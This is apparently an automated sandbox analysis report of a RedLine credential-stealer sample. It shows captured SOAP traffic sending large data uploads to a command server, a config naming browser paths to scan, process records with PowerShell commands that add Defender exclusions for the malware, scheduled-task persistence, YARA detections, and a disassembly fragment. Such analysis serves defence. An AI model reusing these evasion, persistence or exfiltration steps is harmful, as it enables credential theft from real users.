                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                    Aug 31, 2024 14:42:08.138240099 CEST223OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                    Host: 45.137.22.239:55615
                    Content-Length: 144
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Aug 31, 2024 14:42:08.312958956 CEST25INHTTP/1.1 100 Continue
                    Aug 31, 2024 14:42:08.740880013 CEST1236INHTTP/1.1 200 OK
                    Content-Length: 5066
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:07 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>191.101.157.121</b:string><b:string>176.100.243.133</b:string><b:string>217.111.63.60</b:string><b:string>20.114.22.115</b:string><b:string>20.114.22.115</b:string><b:string>14.33.131.72</b:string><b:string>188.126.94.91</b:string><b:string>35.192.93.107</b:string><b:string>20.99.160.173</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Ch [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.44973945.137.22.239556157792C:\Users\user\Desktop\PzPxqbK89H.exe
                    TimestampBytes transferredDirectionData
                    Aug 31, 2024 14:42:11.686870098 CEST221OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                    Host: 45.137.22.239:55615
                    Content-Length: 957268
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Aug 31, 2024 14:42:13.421303034 CEST294INHTTP/1.1 200 OK
                    Content-Length: 147
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:11 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                    Aug 31, 2024 14:42:13.423672915 CEST217OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                    Host: 45.137.22.239:55615
                    Content-Length: 957260
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Aug 31, 2024 14:42:13.594270945 CEST25INHTTP/1.1 100 Continue
                    Aug 31, 2024 14:42:14.178579092 CEST408INHTTP/1.1 200 OK
                    Content-Length: 261
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:12 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.44974145.137.22.239556153548C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    TimestampBytes transferredDirectionData
                    Aug 31, 2024 14:42:12.475141048 CEST240OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                    Host: 45.137.22.239:55615
                    Content-Length: 137
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Aug 31, 2024 14:42:13.092394114 CEST359INHTTP/1.1 200 OK
                    Content-Length: 212
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:11 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                    Aug 31, 2024 14:42:18.152616978 CEST223OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                    Host: 45.137.22.239:55615
                    Content-Length: 144
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Aug 31, 2024 14:42:18.349710941 CEST1236INHTTP/1.1 200 OK
                    Content-Length: 5066
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:16 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>191.101.157.121</b:string><b:string>176.100.243.133</b:string><b:string>217.111.63.60</b:string><b:string>20.114.22.115</b:string><b:string>20.114.22.115</b:string><b:string>14.33.131.72</b:string><b:string>188.126.94.91</b:string><b:string>35.192.93.107</b:string><b:string>20.99.160.173</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Ch [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.44974845.137.22.239556153548C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    TimestampBytes transferredDirectionData
                    Aug 31, 2024 14:42:20.669485092 CEST221OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                    Host: 45.137.22.239:55615
                    Content-Length: 956866
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Aug 31, 2024 14:42:22.144268036 CEST294INHTTP/1.1 200 OK
                    Content-Length: 147
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:20 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.44974945.137.22.239556153548C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    TimestampBytes transferredDirectionData
                    Aug 31, 2024 14:42:22.154294968 CEST241OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                    Host: 45.137.22.239:55615
                    Content-Length: 956858
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Aug 31, 2024 14:42:23.632262945 CEST408INHTTP/1.1 200 OK
                    Content-Length: 261
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:22 GMT
                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:08:41:52
                    Start date:31/08/2024
                    Path:C:\Users\user\Desktop\PzPxqbK89H.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Imagebase:0xf80000
                    File size:530'952 bytes
                    MD5 hash:A3DD5C4C73ED04342CB2319FF7CFC714
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:08:41:58
                    Start date:31/08/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Imagebase:0x1e0000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:08:41:58
                    Start date:31/08/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:08:41:58
                    Start date:31/08/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Imagebase:0x1e0000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:08:41:58
                    Start date:31/08/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:08:41:58
                    Start date:31/08/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp"
                    Imagebase:0x570000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:08:41:58
                    Start date:31/08/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:08:41:59
                    Start date:31/08/2024
                    Path:C:\Users\user\Desktop\PzPxqbK89H.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Imagebase:0x5d0000
                    File size:530'952 bytes
                    MD5 hash:A3DD5C4C73ED04342CB2319FF7CFC714
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:9
                    Start time:08:41:59
                    Start date:31/08/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:10
                    Start time:08:42:01
                    Start date:31/08/2024
                    Path:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    Imagebase:0x80000
                    File size:530'952 bytes
                    MD5 hash:A3DD5C4C73ED04342CB2319FF7CFC714
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 61%, ReversingLabs
                    • Detection: 61%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:11
                    Start time:08:42:01
                    Start date:31/08/2024
                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Imagebase:0x7ff693ab0000
                    File size:496'640 bytes
                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:12
                    Start time:08:42:09
                    Start date:31/08/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp"
                    Imagebase:0x570000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:13
                    Start time:08:42:09
                    Start date:31/08/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:14
                    Start time:08:42:09
                    Start date:31/08/2024
                    Path:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Imagebase:0xa00000
                    File size:530'952 bytes
                    MD5 hash:A3DD5C4C73ED04342CB2319FF7CFC714
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:15
                    Start time:08:42:09
                    Start date:31/08/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:12.1%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:3.6%
                      Total number of Nodes:248
                      Total number of Limit Nodes:10
                      execution_graph 33492 17fd01c 33493 17fd034 33492->33493 33494 17fd08e 33493->33494 33499 5891ea8 33493->33499 33503 5891e97 33493->33503 33507 5892bd0 33493->33507 33516 589115c 33493->33516 33500 5891ece 33499->33500 33501 589115c CallWindowProcW 33500->33501 33502 5891eef 33501->33502 33502->33494 33504 5891ece 33503->33504 33505 589115c CallWindowProcW 33504->33505 33506 5891eef 33505->33506 33506->33494 33510 5892bd5 33507->33510 33508 5892c79 33541 5891284 33508->33541 33510->33508 33511 5892c69 33510->33511 33525 5892d9b 33511->33525 33530 5892da0 33511->33530 33535 5892e6c 33511->33535 33512 5892c77 33519 5891167 33516->33519 33517 5892c79 33518 5891284 CallWindowProcW 33517->33518 33521 5892c77 33518->33521 33519->33517 33520 5892c69 33519->33520 33522 5892d9b CallWindowProcW 33520->33522 33523 5892e6c CallWindowProcW 33520->33523 33524 5892da0 CallWindowProcW 33520->33524 33522->33521 33523->33521 33524->33521 33526 5892da0 33525->33526 33545 5892e48 33526->33545 33548 5892e58 33526->33548 33527 5892e40 33527->33512 33532 5892db4 33530->33532 33531 5892e40 33531->33512 33533 5892e48 CallWindowProcW 33532->33533 33534 5892e58 CallWindowProcW 33532->33534 33533->33531 33534->33531 33536 5892e2a 33535->33536 33537 5892e7a 33535->33537 33539 5892e48 CallWindowProcW 33536->33539 33540 5892e58 CallWindowProcW 33536->33540 33538 5892e40 33538->33512 33539->33538 33540->33538 33542 589128f 33541->33542 33543 589435a CallWindowProcW 33542->33543 33544 5894309 33542->33544 